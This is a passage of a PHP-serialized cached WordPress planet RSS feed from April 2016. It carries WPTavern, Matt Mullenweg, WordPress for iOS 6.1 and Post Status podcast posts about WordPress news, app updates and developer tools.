attendees</a>. WordPress’ rapidly growing international user base and the expanding Polyglots team could make the Global Translation Day event a catalyst for future improvements to the project.</p>\n<p>“If we can go one step further, it would be awesome to revive the conversation about multilingual in core,” Rakovska said. The success of this past weekend’s event shows the Polyglots’ enthusiasm and determination to collaborate across borders to get things done.</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 26 Apr 2016 17:11:28 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:38;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:62:\"WPTavern: I’m Attending WordCamp Chicago, 2016, This Weekend\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=54065\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"http://wptavern.com/im-attending-wordcamp-chicago-2016-this-weekend\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1872:\"<p><a href=\"https://2016.chicago.wordcamp.org/\">WordCamp Chicago 2016</a> takes place this weekend and I’ll be among the many attendees. I haven’t visited the city <a href=\"http://wptavern.com/my-wordcamp-chicago-experience\">since 2009</a> and I’m excited to satisfy my craving for deep dish pizza at <a href=\"http://www.loumalnatis.com/\">Lou Malnati’s</a>.</p>\n<p>WordCamp Chicago 2009 is a special memory because it’s where I saw a demo of <a href=\"http://www.gravityforms.com/\">Gravity Forms</a> before it launched to the public. At the time Contact Form 7 was a household name and the go-to plugin for creating forms. I knew it was going to be successful when I saw its user interface and how it worked. Seven years later, the plugin is still going strong.</p>\n<p>The GPL license was also hot topic at the time. During Matt Mullenweg’s State of the Word presentation, he announced that the WordPress Theme directory would have a section dedicated to theme shops that were 100% GPL. I remember hearing the room gasp during his announcement.</p>\n<p><a href=\"https://www.flickr.com/photos/jeffc316/3611592503/in/album-72157619302065170/\"><img src=\"http://i2.wp.com/farm4.staticflickr.com/3659/3611592503_8deb33cc39_z.jpg?resize=640%2C480&ssl=1\" alt=\"100_2303\" /></a></p>\n<p>In 2009, the WordPress commercial theme market was young and the GPL was a license many theme companies didn’t embrace. Having your company <a href=\"https://wordpress.org/themes/commercial/\">listed on a page</a> that gets a ton of traffic motivated at least a couple of theme shops to embrace the GPL.</p>\n<p>I’m looking forward to meeting new people this weekend and creating new memories. If you happen to see me, please stop and say hi. I’d love to talk to you about your experiences with WordPress.</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 26 Apr 2016 06:12:10 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:39;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:76:\"WPTavern: WordPress for iOS Adds Geotag Support, Comment Moderation Gestures\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=54024\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:85:\"http://wptavern.com/wordpress-for-ios-adds-geotag-support-comment-moderation-gestures\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2967:\"<p>WordPress for iOS 6.1 is <a href=\"https://itunes.apple.com/us/app/wordpress/id335703880?mt=8&uo=6&at=&ct=\">available from the App Store</a> and includes a number of improvements. Those who use Jetpack can now manage Publicize connections from within the app.</p>\n<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2016/04/img_8539.png\"><img class=\"aligncenter size-large wp-image-54047\" src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2016/04/img_8539.png?resize=282%2C500\" alt=\"Publicize Connections\" /></a>Comments can quickly be moderated thanks to gestures added to the notifications screen. Swiping left on a notification displays options to approve, unapprove, spam, or trash a comment.</p>\n<a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2016/04/CommentModerationGestures.png\"><img class=\"size-large wp-image-54054\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2016/04/CommentModerationGestures.png?resize=281%2C500\" alt=\"Comment Moderation Gestures\" /></a>Comment Moderation Gestures\n<p>If you’ve connected multiple sites to the app, it can be cumbersome to navigate to the one you access most often. This version includes the ability to set up a primary site from within the Account Settings panel. During testing however, I noticed my version of the app doesn’t have this setting. I’m going through the support process to determine the cause.</p>\n<a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2016/04/img_8537.png\"><img class=\"size-large wp-image-54043\" src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2016/04/img_8537.png?resize=282%2C500\" alt=\"Configure a Primary Site\" /></a>My Account Settings Page\n<p>A new UI element at the bottom of the post creation screen allows users to geotag a post. Simply type in an address or location into the search field and a map displays with the location data. The location is stored in the WordPress backend but can be displayed on the frontend if a theme supports it.</p>\n<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/04/img_8538.png\"><img class=\"size-large wp-image-54044\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/04/img_8538.png?resize=282%2C500\" alt=\"Geotag Support\" /></a>Geotag Support\n<p>A full list <a href=\"https://github.com/wordpress-mobile/WordPress-iOS/issues?q=is%3Aclosed+is%3Aissue+milestone%3A6.1+label%3A%22[Type]+Enhancement%22\">of changes</a> and <a href=\"https://github.com/wordpress-mobile/WordPress-iOS/issues?q=is%3Aclosed+is%3Aissue+milestone%3A6.1+label%3A%22[Type]+Bug%22\">bug fixes</a> is available on GitHub where you can also follow the <a href=\"https://github.com/wordpress-mobile/WordPress-iOS/issues?utf8=%E2%9C%93&q=is%3Aissue+milestone%3A6.2+\">progress of 6.2</a>. If you have any issues or think you’ve discovered a bug, please report it on the <a href=\"https://ios.forums.wordpress.org/\">WordPress for iOS support forums</a>.</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 26 Apr 2016 04:03:58 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:40;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:64:\"WPTavern: WordPress 4.6 to Update Theme Filter Tags in the Admin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=53952\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:74:\"http://wptavern.com/wordpress-4-6-to-update-theme-filter-tags-in-the-admin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2093:\"<p>The admin themes browser has been updated and modernized in recent years to make it easier to search through the 3,800+ themes available on WordPress.org. One aspect of the interface that has lagged behind, however, is the list of tags for filtering themes. The tags have gone untouched since back in the day when users would search themes by color.</p>\n<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/04/theme-tags.png\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/04/theme-tags.png?resize=1025%2C726\" alt=\"theme-tags\" class=\"aligncenter size-full wp-image-54013\" /></a></p>\n<p>The WordPress Theme Review Team’s <a href=\"https://core.trac.wordpress.org/ticket/33407\" target=\"_blank\">proposal to overhaul the outdated tags/filters</a> is making it into WordPress 4.6. All of the color tags will be removed, which makes sense since many modern themes are customizable when it comes to accent colors. The update will also remove fixed, fluid, and responsive layouts and will add ‘Grid Layout’ to the list. In the list of miscellaneous features, Blavatar will be removed and Footer Widgets will be added.</p>\n<p>The Subject section will be completely revamped by removing the all the previous tags and replacing them with a new list of general theme categories:</p>\n<ul>\n<li>Blog</li>\n<li>E-Commerce</li>\n<li>Education</li>\n<li>Entertainment</li>\n<li>Food & Drink</li>\n<li>Holiday</li>\n<li>News</li>\n<li>Photography</li>\n<li>Portfolio</li>\n</ul>\n<p>The tags will also be updated on the WordPress Theme Directory <a href=\"https://meta.trac.wordpress.org/ticket/1187\" target=\"_blank\">in cooperation with the meta team</a>.</p>\n<p>The WordPress theme landscape has changed so much over the years, especially with the introduction of the customizer, and this update will make it easier for users to narrow down themes they want to use. WordPress.org theme authors will want to be ready to update their themes as soon as the new tags are available so that they can be more easily found via search.</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 25 Apr 2016 18:51:42 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:41;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:25:\"Matt: 538 on Basic Income\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:22:\"https://ma.tt/?p=46513\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:42:\"https://ma.tt/2016/04/538-on-basic-income/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:746:\"<blockquote><p>The economic uncertainty surrounding basic income is huge, and the politics of bringing such a program about on a large scale are daunting. But something makes this radical proposal so exciting that people and governments are increasingly willing to try it. Basic income challenges our notions of the social safety net, the relationship between work and income, and how to adapt to technological change. That makes it one of the most audacious social policy experiments in modern history. It could fail disastrously, or it could change everything for the better.</p></blockquote>\n<p>From FiveThirtyEight, <a href=\"http://fivethirtyeight.com/features/universal-basic-income/\">What Would Happen If We Just Gave People Money?</a></p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 25 Apr 2016 15:12:59 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:42;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:46:\"WP Mobile Apps: WordPress for iOS: Version 6.1\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://apps.wordpress.com/?p=3375\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"https://apps.wordpress.com/2016/04/25/wordpress-for-ios-version-6-1/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3668:\"<p>Hi there, WordPress users! <a href=\"https://itunes.apple.com/us/app/wordpress/id335703880?mt=8&uo=6&at=&ct=\">Version 6.1 of the WordPress for iOS app</a> is now available in the App Store.</p>\n<h1>What’s New:</h1>\n<p><strong>Get social on the go!</strong> WordPress.com and Jetpack-enabled bloggers can manage Publicize and third-party sharing from within the app.</p>\n<p><strong>More gestures!</strong> Swipe notifications to approve, unapprove, and trash comments at the speed of your thumbs.</p>\n\n<a href=\"https://apps.wordpress.com/img_2189/\"><img width=\"169\" height=\"300\" src=\"https://apps.files.wordpress.com/2016/04/img_2189.png?w=169&h=300\" class=\"attachment-medium size-medium\" alt=\"Swipe left to unveil the new moderation options.\" /></a>\n\n<p><strong>Mobile friendly.</strong> Select your primary blog right from within the app.</p>\n\n<a href=\"https://apps.wordpress.com/img_2187-new/\"><img width=\"169\" height=\"300\" src=\"https://apps.files.wordpress.com/2016/04/img_2187-new.png?w=169&h=300\" class=\"attachment-medium size-medium\" alt=\"You can select your primary site in \" /></a>\n<a href=\"https://apps.wordpress.com/img_2188/\"><img width=\"169\" height=\"300\" src=\"https://apps.files.wordpress.com/2016/04/img_2188.png?w=169&h=300\" class=\"attachment-medium size-medium\" alt=\"Pick it with a simple tap!\" /></a>\n\n<p><strong>Where’s Waldo? </strong>Search locations to tag GPS on posts.</p>\n\n<a href=\"https://apps.wordpress.com/img_2190-new/\"><img width=\"169\" height=\"300\" src=\"https://apps.files.wordpress.com/2016/04/img_2190-new.png?w=169&h=300\" class=\"attachment-medium size-medium\" alt=\"GPS tag your posts!\" /></a>\n<a href=\"https://apps.wordpress.com/img_2191/\"><img width=\"169\" height=\"300\" src=\"https://apps.files.wordpress.com/2016/04/img_2191.png?w=169&h=300\" class=\"attachment-medium size-medium\" alt=\"Tap on \" /></a>\n<a href=\"https://apps.wordpress.com/img_2192/\"><img width=\"169\" height=\"300\" src=\"https://apps.files.wordpress.com/2016/04/img_2192.png?w=169&h=300\" class=\"attachment-medium size-medium\" alt=\"Use the search field to select the right location.\" /></a>\n\n<p><strong>Enhancements.</strong> Because “good” is not enough! Here’s the full <a href=\"https://github.com/wordpress-mobile/WordPress-iOS/issues?q=is%3Aclosed+is%3Aissue+milestone%3A6.1+label%3A%22%5BType%5D+Enhancement%22\">list of enhancements</a>.</p>\n<p><strong>Bug fixes.</strong> Tons of <a href=\"https://github.com/wordpress-mobile/WordPress-iOS/issues?q=is%3Aclosed+is%3Aissue+milestone%3A6.1+label%3A%22%5BType%5D+Bug%22\">bug fixes</a>!</p>\n<h1>Thank You</h1>\n<p>Thanks to all of the contributors who worked on this release:<br />\n<a href=\"https://github.com/aerych\">@aerych</a>, <a href=\"https://github.com/alexcurylo\">@alexcurylo</a>, <a href=\"https://github.com/astralbodies\">@astralbodies</a>, <a href=\"https://github.com/diegoreymendez\">@diegoreymendez</a>, <a href=\"https://github.com/frosty\">@frosty</a>, <a href=\"https://github.com/jleandroperez\">@jleandroperez</a>, <a href=\"https://github.com/koke\">@koke</a>, <a href=\"https://github.com/kurzee\">@kurzee</a>, <a href=\"https://github.com/kwonye\">@kwonye</a>, <a href=\"https://github.com/sendhil\">@sendhil</a> and <a href=\"https://github.com/SergioEstevao\">@SergioEstevao</a>.</p>\n<p>You can track the development progress for the next update by visiting <a href=\"https://github.com/wordpress-mobile/WordPress-iOS/issues?utf8=✓&q=is%3Aissue+milestone%3A6.2+\" target=\"_blank\">our 6.2 milestone on GitHub</a>. Until next time!</p><img alt=\"\" border=\"0\" src=\"https://pixel.wp.com/b.gif?host=apps.wordpress.com&blog=108068616&post=3375&subd=apps&ref=&feed=1\" width=\"1\" height=\"1\" />\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 25 Apr 2016 13:30:37 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"diegoreymendez\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:43;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:58:\"Post Status: WordPress Development Tools — Draft Podcast\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"https://poststatus.com/?p=24094\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:65:\"https://poststatus.com/wordpress-development-tools-draft-podcast/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5344:\"<p>Welcome to the Post Status <a href=\"https://poststatus.com/category/draft\">Draft podcast</a>, which you can find <a href=\"https://itunes.apple.com/us/podcast/post-status-draft-wordpress/id976403008\">on iTunes</a>, <a href=\"http://www.stitcher.com/podcast/krogsgard/post-status-draft-wordpress-podcast\">Stitcher</a>, and <a href=\"http://simplecast.fm/podcasts/1061/rss\">via RSS</a> for your favorite podcatcher. Post Status Draft is hosted by Joe Hoyle — the CTO of Human Made — and Brian Krogsgard.</p>\n<p><span>Everybody creates workflows to accomplish their development work. And sometimes you come upon a new tool that completely changes how you do things, and helps you improve your productivity.</span></p>\n<p><span>In this episode, Joe and Brian aim to share their tools in the hopes that it will help others review and refine their own processes. And Joe and Brian approach things quite differently themselves, so they compare and contrast their own workflows. Have something to add to the conversation, be sure to comment!</span></p>\n<a href=\"https://audio.simplecast.com/36197.mp3\">https://audio.simplecast.com/36197.mp3</a>\n<p><a href=\"http://audio.simplecast.com/36197.mp3\">Direct Download</a></p>\n<h3>Tools</h3>\n<ul>\n<li><a href=\"https://github.com/modmore/Gitify\">Gitify</a>, <a href=\"http://www.cockos.com/licecap/\">lice-cap</a></li>\n<li><a href=\"http://www.capturedapp.com/\">Captured (straight to S3)</a>, <a href=\"http://gifhub.org/\">Gifhub</a>, <a href=\"https://www.telestream.net/screenflow/\">Screenflow</a>, <a href=\"https://cloudup.com/\">Cloudup</a></li>\n<li><a href=\"https://www.authy.com/\">Authy</a></li>\n<li><a href=\"https://justgetflux.com/\">F.lux</a></li>\n<li><a href=\"https://www.tunnelbear.com/\">TunnelBear</a></li>\n<li><a href=\"https://www.alfredapp.com/\">Alfred</a></li>\n<li><a href=\"https://slack.com/\">Slack</a></li>\n</ul>\n<h3>Coding Tools & Debugging</h3>\n<ul>\n<li><a href=\"https://www.jetbrains.com/phpstorm/\">PHPStorm</a>, <a href=\"https://www.sublimetext.com/\">Sublime</a>, <a href=\"https://atom.io/\">Atom</a>, <a href=\"http://www.vim.org/\">VIM</a>, <a href=\"https://panic.com/coda/\">Coda</a></li>\n<li><a href=\"https://xdebug.org/\">Xdebug</a>, <a href=\"http://php.net/manual/en/function.var-dump.php\">var_dump</a>, <a href=\"https://pecl.php.net/package/xhprof\">XHProf</a></li>\n<li><a href=\"https://github.com/jkbrzt/httpie\">httpie</a></li>\n<li><a href=\"https://atom.io/packages\">Atom Packages</a>: <a href=\"https://atom.io/packages/autocomplete-php\">php-autocomplete</a>, WPCS, <a href=\"https://atom.io/packages/linter-php\">php-linter</a></li>\n<li><a href=\"https://facebook.github.io/react/blog/2015/09/02/new-react-developer-tools.html\">React-console</a></li>\n<li><a href=\"https://wordpress.org/plugins/query-monitor/\">Query Monitor</a></li>\n<li><a href=\"http://www.sequelpro.com/\">Sequel Pro</a>, <a href=\"http://dev.mysql.com/doc/refman/5.7/en/mysql.html\">mysql command line</a></li>\n<li><a href=\"https://www.iterm2.com/\">iTerm2</a></li>\n<li><a href=\"http://wp-cli.org/\">wp-cli!!!</a></li>\n</ul>\n<h3>Build Tools</h3>\n<ul>\n<li><a href=\"http://gruntjs.com/\">Grunt</a></li>\n<li><a href=\"http://gulpjs.com/\">Gulp</a></li>\n<li><a href=\"https://www.gnu.org/software/make/\">Make</a></li>\n<li><a href=\"https://imageoptim.com/mac\">ImageOptim</a></li>\n<li><a href=\"https://www.npmjs.com/package/grunt-sass\">Grunt-sass</a> vs. <a href=\"https://www.npmjs.com/package/grunt-contrib-sass\">grunt-contrib-sass</a></li>\n</ul>\n<h3>Version Control / Review Tools / Deployment</h3>\n<ul>\n<li><a href=\"http://jonas.nitro.dk/tig/\">Tig</a>, <a href=\"https://www.git-tower.com/\">Tower</a></li>\n<li><a href=\"https://hub.github.com/\">Hub</a></li>\n<li><a href=\"https://github.com/\">Github</a></li>\n<li><a href=\"http://www.araxis.com/merge/index.en\">Araxis Merge</a></li>\n<li><a href=\"http://deploybot.com/\">DeployBot</a> / <a href=\"http://beanstalkapp.com/\">Beanstalk</a></li>\n<li><a href=\"https://panic.com/transmit/\">Transmit (S3/SFTP)</a></li>\n</ul>\n<h3>Frontend Tools / Extensions</h3>\n<ul>\n<li><a href=\"https://developer.chrome.com/devtools\">Chrome Inspector / Console</a></li>\n<li><a href=\"https://www.getpostman.com/\">Postman</a></li>\n<li><a href=\"https://developer.chrome.com/devtools/docs/javascript-debugging\">Chrome JS Debugger</a></li>\n<li><a href=\"https://chrome.google.com/webstore/detail/ip-address-and-domain-inf/lhgkegeccnckoiliokondpaaalbhafoa?hl=en\">IP & Domain Info extension</a></li>\n<li><a href=\"https://chrome.google.com/webstore/detail/web-developer/bfbameneiokkgbdmiekhjnmfkcnldhhm?hl=en\">Web Developer</a></li>\n<li><a href=\"https://wappalyzer.com/\">Wappalyzer</a></li>\n<li><a href=\"http://codepen.io/\">CodePen</a></li>\n</ul>\n<h3>Sponsor</h3>\n<p class=\"p1\"><span class=\"s1\">This podcast is sponsored by <a href=\"https://yoast.com/\">Yoast</a>. Yoast SEO is the best WordPress SEO plugin available, with a premium version to provide expert support and additional features. Thank you to Yoast for being a Post Status partner.</span></p>\n<h3>Related Podcasts</h3>\n<p><a href=\"https://poststatus.com/understanding-wp-cli-and-a-discussion-on-micro-plugin-businesses-draft-podcast/\">Understanding WP-CLI</a></p>\n<p><a href=\"https://poststatus.com/local-wordpress-development-strategies-and-transparency-in-business-draft-podcast/\">Local WordPress Development Strategies</a></p>\n<p> </p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 23 Apr 2016 14:06:22 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Katie Richards\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:44;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:43:\"WPTavern: In Case You Missed It – Issue 8\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:44:\"http://wptavern.com?p=53989&preview_id=53989\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:49:\"http://wptavern.com/in-case-you-missed-it-issue-8\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5006:\"<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/01/ICYMIFeaturedImage.png\" rel=\"attachment 